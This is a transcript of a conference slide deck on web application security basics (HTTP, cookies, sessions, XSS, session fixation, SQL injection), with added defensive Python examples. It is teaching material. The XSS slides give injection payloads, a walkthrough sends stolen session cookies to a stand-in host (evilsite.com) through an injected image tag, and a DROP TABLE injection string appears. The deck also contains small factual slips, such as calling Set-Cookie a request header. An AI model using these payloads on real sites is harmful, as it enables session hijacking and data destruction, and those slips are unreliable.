Webapp security testing (SlideShare; published in: Technology; 1,072 views, 9 downloads, 3 likes, 0 comments)
Speaker notes (only three slides have any):
  • TCP (Reliable, ordered). Host, port number. Request and response. GET/HEAD/POST. Headers.
  • Add a mandatory ‘Host’ header. We have run out of IP addresses - this means you can have multiple sites per IP.
  • Set-Cookie / Cookie / Domain / Path / Secure
Fundamentals of web application security & security testing
t0m <bobtfish@bobtfish.net>

Who are you?
• Open source hacker
• github.com/bobtfish/
• Perl guy (sorry) - 160 CPAN modules
• Core team for Catalyst and Plack web frameworks.
• Ex professional security tester / R&D

This talk
• ~ 1h long
• Covers the very basics
  • HTTP
  • Host headers
  • Cookies
• Tools
  • Paros / Charles / etc
• Sessions
  • Session fixation attacks
• XSS (General HTML injection)
  • How to test
  • How to exploit
• SQL Injection
• NOT comprehensive.
• JUST the basics.

You don’t need to be a programmer
• I’m going to assume you know a bit about the internet
• And that you’ve at least seen HTML before.

Workshop on Sunday
• No schedule - made by you!
• Deeper and more practical discussion

HTML
• The markup format that web pages are written in.
• I’m just assuming you all know the basics
• Sorry if you don’t ;P
• Can almost always be sloppy - browser tries to do the right thing.

HTTP - The very basics
• HTTP goes over TCP/IP
  • Reliable, ordered
  • Host and port
• Request / Response
  • URL
  • Method

Request / Response
• You ask the server for some data
• It does some work
• And serves you a response, possibly including data, called a ‘body’

Dynamic
• The response could just be a file on disc
• HTML, image, etc
• We’re interested in when it’s dynamic - i.e. when your input changes the HTML output.
GET / HTTP/1.0 - example exchange

    GET / HTTP/1.0

    HTTP/1.1 200 OK
    Date: Wed, 29 Aug 2012 21:47:59 GMT
    Server: Apache
    Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT
    ETag: "1c888b-0-4a90a5e239540"
    Accept-Ranges: bytes
    Content-Length: 0
    Vary: Accept-Encoding
    Connection: close
    Content-Type: text/html
    X-Pad: avoid browser bug

GET / HTTP/1.0
• Simplest possible HTTP request
• Method - GET
• URL /
• HTTP version
• Followed by \r\n\r\n
• Headers optional after first line
• Body can be supplied after \r\n\r\n if you specify a non-zero content length
• There will be examples of this later

HTTP/1.1 200 OK
• Always the first line of the response
• We asked for 1.0, got 1.1 back
• 200 is the response code.
  • 2xx - Success
  • 3xx - Redirect
  • 4xx - User error
  • 5xx - Server error

Date: Wed, 29 Aug 2012 21:47:59 GMT
• Other headers now follow. All in the format: Key: Value
• Date: RFC822
• Optional

Server: Apache
• Sometimes has exact versions and extensions
• Easy to lie
• Optional

Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT
• Used for caching (maybe)
• Optional

ETag: "1c888b-0-4a90a5e239540"
• Used for caching (maybe)
• Optional

Accept-Ranges: bytes
• ‘Partial GET’
• Ask for a byte range in the file
• Get back just that part
• Used by ‘download managers’ to resume
• Optional

Content-Length: 0
• Mandatory!
• Specifies how long the body is
• Can be 0

Vary: Accept-Encoding
• For caching
  • Which header fields mean a different version of the document
  • E.g. language detection
• Optional

Connection: close
• Server is going to drop the connection, you have to reconnect.
• Possible to keep the connection persistent, if you ask for it

Content-Type: text/html
• How the browser should interpret the body
• Mandatory for documents with a body

HTTP 1.1
• Adds a mandatory Host header to the request
• Allows > 1 web site per IP address

HTTP 1.1 - example exchange

    GET / HTTP/1.1
    Host: goatse.co.uk

    HTTP/1.1 200 OK
    Date: Wed, 29 Aug 2012 21:49:49 GMT
    Server: Apache
    Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT
    ETag: "1c888b-0-4a90a5e239540"
    Accept-Ranges: bytes
    Content-Length: 0
    Vary: Accept-Encoding
    Connection: close
    Content-Type: text/html
    X-Pad: avoid browser bug
Sending data to the server
• Encode it into the URI
  • /with/a/path
  • /?or=parameters

POST
• Used to send data back to the server
• Content-Type: application/x-www-form-urlencoded
• Has a Content-Length, and a body
• Data is encoded like this: foo=bar&foo2=baz

POST - example request

    POST / HTTP/1.1
    Host: www.example.com
    Content-Length: 17
    Content-Type: application/x-www-form-urlencoded

    foo=bar&foo2=quux

Forms
• HTML forms are the primary means of getting user data to the server
• Data is in the body, not the URL, so they don’t get saved in bookmarks
• <form> tag
• <input> tag
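As an added example (not code from the deck), here is the request and response format from the slides above in Python: a small parser that splits a raw response into status line, headers and a body of exactly Content-Length bytes, so that a second response arriving on a kept-alive connection is not mistaken for the first one's body, and a builder for the POST request on the previous slide that computes Content-Length from the form-encoded body. The raw responses are constructed here to mirror the slide's headers; the 404 response following the second one is a constructed addition.

```python
from urllib.parse import urlencode

# Constructed copy of the headers-only response shown on the GET / slide.
RAW_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Wed, 29 Aug 2012 21:47:59 GMT\r\n"
    b"Server: Apache\r\n"
    b"Content-Length: 0\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
)

# Constructed: a 5-byte body immediately followed by the next response on a
# persistent connection. Only Content-Length tells us where the body stops.
RAW_RESPONSE_WITH_BODY = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Length: 5\r\n"
    b"Content-Type: text/plain\r\n"
    b"\r\n"
    b"hello"
    b"HTTP/1.1 404 Not Found\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

STATUS_CLASSES = {2: "Success", 3: "Redirect", 4: "User error", 5: "Server error"}


def status_class(code):
    """Map a status code to the class named on the slide (2xx, 3xx, 4xx, 5xx)."""
    return STATUS_CLASSES.get(code // 100, "Unknown")


def parse_response(raw):
    """Split a raw HTTP response into status line, headers, body and remainder.

    The header block ends at the first blank line (CRLF CRLF). The body is
    exactly Content-Length bytes (treated as 0 when absent); whatever follows
    is returned as 'remainder' because it belongs to the next response.
    """
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete header block")
    status_line, *header_lines = head.decode("latin-1").split("\r\n")
    parts = status_line.split(" ", 2)
    version, code = parts[0], parts[1]
    reason = parts[2] if len(parts) > 2 else ""
    headers = {}
    for line in header_lines:
        key, colon, value = line.partition(":")
        if not colon:
            raise ValueError(f"malformed header line: {line!r}")
        headers[key.strip().lower()] = value.strip()  # header names are case-insensitive
    length = int(headers.get("content-length", "0"))
    if len(rest) < length:
        raise ValueError("body shorter than Content-Length")
    return {
        "version": version,
        "status": int(code),
        "reason": reason,
        "headers": headers,
        "body": rest[:length],
        "remainder": rest[length:],
    }


def build_post(host, path, params):
    """Build the POST request from the slide: form-encoded body plus Host,
    Content-Type and a Content-Length computed from the encoded body."""
    body = urlencode(params).encode("ascii")
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
    )
    return head.encode("ascii") + body


if __name__ == "__main__":
    first = parse_response(RAW_RESPONSE_WITH_BODY)
    second = parse_response(first["remainder"])
    print(first["status"], status_class(first["status"]), first["body"])
    print(second["status"], status_class(second["status"]))
    print(build_post("www.example.com", "/", {"foo": "bar", "foo2": "quux"}).decode())
```

Header names are lower-cased on the way in because HTTP treats them case-insensitively; a parser that only matches `Content-Length` exactly will silently get the body boundary wrong when a server sends `content-length`.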
Ok - basics covered!
• Phew!
• Let’s put all this stuff together - into an application.
• And then hack it.

Simplest possible app

    <html>
    Data is: <form><input name="foo" value="<?php echo $_GET['foo'] ?>" /><input type="submit" /></form>
    </html>

    http://server/test.php?foo=foo

FAIL
• Did you spot the epic fail?
• value="<?php echo $_GET['foo'] ?>"
• Golden rule - never ever accept input without validating it’s sane
• Golden rule - never ever output anything that may have come from external input without encoding it

WHY?
• You can send: ?foo="><blink>Foo<%2Fblink>
• Comes out as: <input name="foo" value=""><blink>Foo</blink>
• You just added HTML to the document - fail!

Javascript
• Is where it all goes really wrong
• Can change or rewrite the page
• Can be inserted inline into HTML
• foo="><script>document.removeChild(document.getElementsByTagName(html)[0])<%2Fscript>

Bye bye page!
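An added example, not the deck's code, that applies the two golden rules from the FAIL slide in Python rather than PHP: the same attribute rendering with and without output encoding, run against the slide's `"><blink>Foo</blink>` input, plus an allowlist validator. The query strings are constructed to match the slides and the allowlist pattern is an assumption made for this example.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed query strings mirroring the slides' inputs (parse_qs URL-decodes them).
HARMLESS_QUERY = "foo=foo"
HTML_QUERY = "foo=%22%3E%3Cblink%3EFoo%3C%2Fblink%3E"   # ?foo="><blink>Foo</blink>

# Assumed allowlist for this field: letters, digits, space and a little
# punctuation, 1 to 64 characters. "Sane" is whatever the field really needs.
SANE_VALUE = re.compile(r"[A-Za-z0-9 _.,-]{1,64}")


def get_param(query_string, name):
    """Return the first value of `name` from a query string, or "" if absent."""
    return parse_qs(query_string).get(name, [""])[0]


def is_sane(value):
    """Golden rule 1: validate input against an allowlist before using it."""
    return SANE_VALUE.fullmatch(value) is not None


def render_unsafe(foo):
    """What the slide's PHP does: the raw value is pasted into the attribute."""
    return f'<input name="foo" value="{foo}" />'


def render_safe(foo):
    """Golden rule 2: encode on output. html.escape(quote=True) turns ", <, >
    and & into entities, so the value can neither close the attribute nor
    start a tag."""
    return f'<input name="foo" value="{html.escape(foo, quote=True)}" />'


def count_tags(markup):
    """Crude check: how many tags would a browser see in this markup?"""
    return len(re.findall(r"<[A-Za-z/!][^>]*>", markup))


def handle(query_string):
    """Validate, then encode. Input that fails validation is rejected with a
    400 rather than 'cleaned up', and the encoded output never trusts it."""
    foo = get_param(query_string, "foo")
    if not is_sane(foo):
        return 400, render_safe("")
    return 200, render_safe(foo)


if __name__ == "__main__":
    payload = get_param(HTML_QUERY, "foo")
    print(render_unsafe(payload), count_tags(render_unsafe(payload)))
    print(render_safe(payload), count_tags(render_safe(payload)))
    print(handle(HARMLESS_QUERY), handle(HTML_QUERY))
```

Both rules are kept on purpose: validation narrows what the field accepts, but encoding is what makes the output safe, and the encoding must match the context (an HTML attribute here; a JavaScript string or a URL would each need their own).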
Less simple example
• Add data storage
• E.g. Message board multiple people can look at
• Doom!
• Or at least vandalism

More theory
• Sorry, but it’s necessary
• People’s credit card numbers are behind login pages
• So we have to understand how logins work to steal them

Cookies (picture slides)
• Not like that!
• Or that!
• Definitely not!
Set-Cookie
• A request header
• Set-Cookie: foo=bar
• Set-Cookie: foo=bar; expires=Thu, 01-Jan-1970 00:01:40 GMT; path=/; domain=example.net

Affects subsequent requests
• Browser returns a “Cookie: foo=bar” header

Sessions
• Hand each visitor a random session token, identify them in future
• Login credentials only transmitted once
• Allows login to be SSL (and rest of site not)
• Shared secret
• If it stops being a secret, you lose!

Stealing cookies
• Can get cookie data from javascript
• If we find an HTML injection vulnerability, we can run code that grabs the cookie
• “Same origin policy” - cannot transmit elsewhere.
• Cheat! Add content to the document.
• <img src="http://evilsite.com/?data=here" />

Let’s step through that
• Message board site gives users a cookie when they login
• Cookie contains session token
• You post an evil message containing Javascript
• Other users view your message
• Other users’ browsers execute your javascript
• It grabs their cookie
• Adds to their page: <img src="http://evilsite.com/?data=cookie_data" />
• User’s browser tries to download image
• evilsite.com records the cookie
• evilsite.com serves a 1px x 1px transparent gif
• I can now post messages as any (still logged in) user who viewed my message.
• Having the user’s cookie allows you to become the user

Did you notice the handwave?
• I need a way to get your cookie into my browser
• This is easy to do - find a proxy library in your favourite programming language ;P
• Or tools you can just download

Session fixation
• Quite a common bug
• Allows you to specify the session ID you’d like
• Useful for abusing XSS elsewhere
• Also good to steal logins without needing XSS.
• /?sessionID=XXXXXXXXXXX
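An added example (not from the deck) that pulls together the Set-Cookie, Sessions, Stealing cookies and Session fixation slides from the defending side: a server-side session store that generates the token itself, sends it with the HttpOnly and Secure attributes, accepts it only from the Cookie request header (never from a `?sessionID=` parameter) and issues a fresh token on login. The cookie name `sid` and the store layout are assumptions made for this example.

```python
import secrets
from http.cookies import SimpleCookie
from urllib.parse import parse_qs

COOKIE_NAME = "sid"   # assumed cookie name for this example


class SessionStore:
    """Server-side table: token -> session data. The token is the shared secret
    the Sessions slide describes, so the server generates it; a client never
    gets to choose it."""

    def __init__(self):
        self._sessions = {}

    def create(self):
        token = secrets.token_urlsafe(32)          # 256 random bits from the OS CSPRNG
        self._sessions[token] = {"user": None}
        return token

    def lookup(self, token):
        return self._sessions.get(token)

    def login(self, token, user):
        """Regenerate the token on login. A token that was set before
        authentication (fixated via a link or an injected cookie) is never
        promoted to a logged-in session; the old token stops working."""
        data = self._sessions.pop(token, None) or {}
        new_token = self.create()
        self._sessions[new_token].update(data, user=user)
        return new_token


def set_cookie_header(token):
    """Set-Cookie line for the session token. HttpOnly keeps document.cookie
    from reading it (the 'Stealing cookies' slides); Secure keeps the browser
    from sending it over plain HTTP."""
    c = SimpleCookie()
    c[COOKIE_NAME] = token
    c[COOKIE_NAME]["path"] = "/"
    c[COOKIE_NAME]["httponly"] = True
    c[COOKIE_NAME]["secure"] = True
    return c.output(header="Set-Cookie:")


def session_token_from_request(cookie_header, query_string):
    """Only the Cookie header is trusted for the token. A ?sessionID=... in the
    URL (the Session fixation slide) is parsed like any parameter but ignored."""
    _ = parse_qs(query_string)   # query parameters never select a session
    if not cookie_header:
        return None
    c = SimpleCookie()
    c.load(cookie_header)
    return c[COOKIE_NAME].value if COOKIE_NAME in c else None


def resolve_session(store, cookie_header, query_string):
    """Return (token, data) for a known token; otherwise start a new session.
    An unknown token presented by the client is dropped, not registered."""
    token = session_token_from_request(cookie_header, query_string)
    data = store.lookup(token) if token else None
    if data is None:
        token = store.create()
        data = store.lookup(token)
    return token, data


if __name__ == "__main__":
    store = SessionStore()
    token, _ = resolve_session(store, None, "sessionID=XXXXXXXXXXX")
    print(set_cookie_header(token))
    print(store.login(token, "fred"), store.lookup(token))
```

Two of the slides' attacks are closed by design here: a fixated ID is useless because the server only honours tokens it created and replaces them at login, and a stolen cookie is harder to obtain because HttpOnly hides it from injected script (the injection itself still needs the output-encoding fix from the FAIL slide).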
Tools - Paros
• http://www.parosproxy.org/

Tools - Charles
• OSX only
• Costs money (free trial)

Tools - Firebug
• Firefox addon
• Allows you to debug javascript and HTML
• Useful for getting exploits working in combination with another tool
SQL Injection
• SQL used by databases, for data storage
• Tables, with columns and rows
• SELECT id, name FROM users WHERE name = ‘fred’ AND password = ‘example’;
• SAME ISSUE AS BEFORE

SQL Injection - what the query becomes

    SELECT id, name FROM users WHERE name = ‘Robert’; DROP TABLE Students;--’ AND password = ‘example’;

• First query. No password needed!: SELECT id, name FROM users WHERE name = ‘Robert’;
• Second query. Ruins your day!: DROP TABLE Students;
• Comment - ignored!: --’ AND password = ‘example’;
Golden Rules
• Never ever accept input without validating it’s sane.
• Never ever output anything that may have come from external input without encoding it.

Thanks for listening!
• Hope that wasn’t too boring :)
• Feel free to come chat to me.
• Or mail me: bobtfish@bobtfish.net
• Or grab me on irc: t0m on Freenode
• More in-depth workshop on Sunday!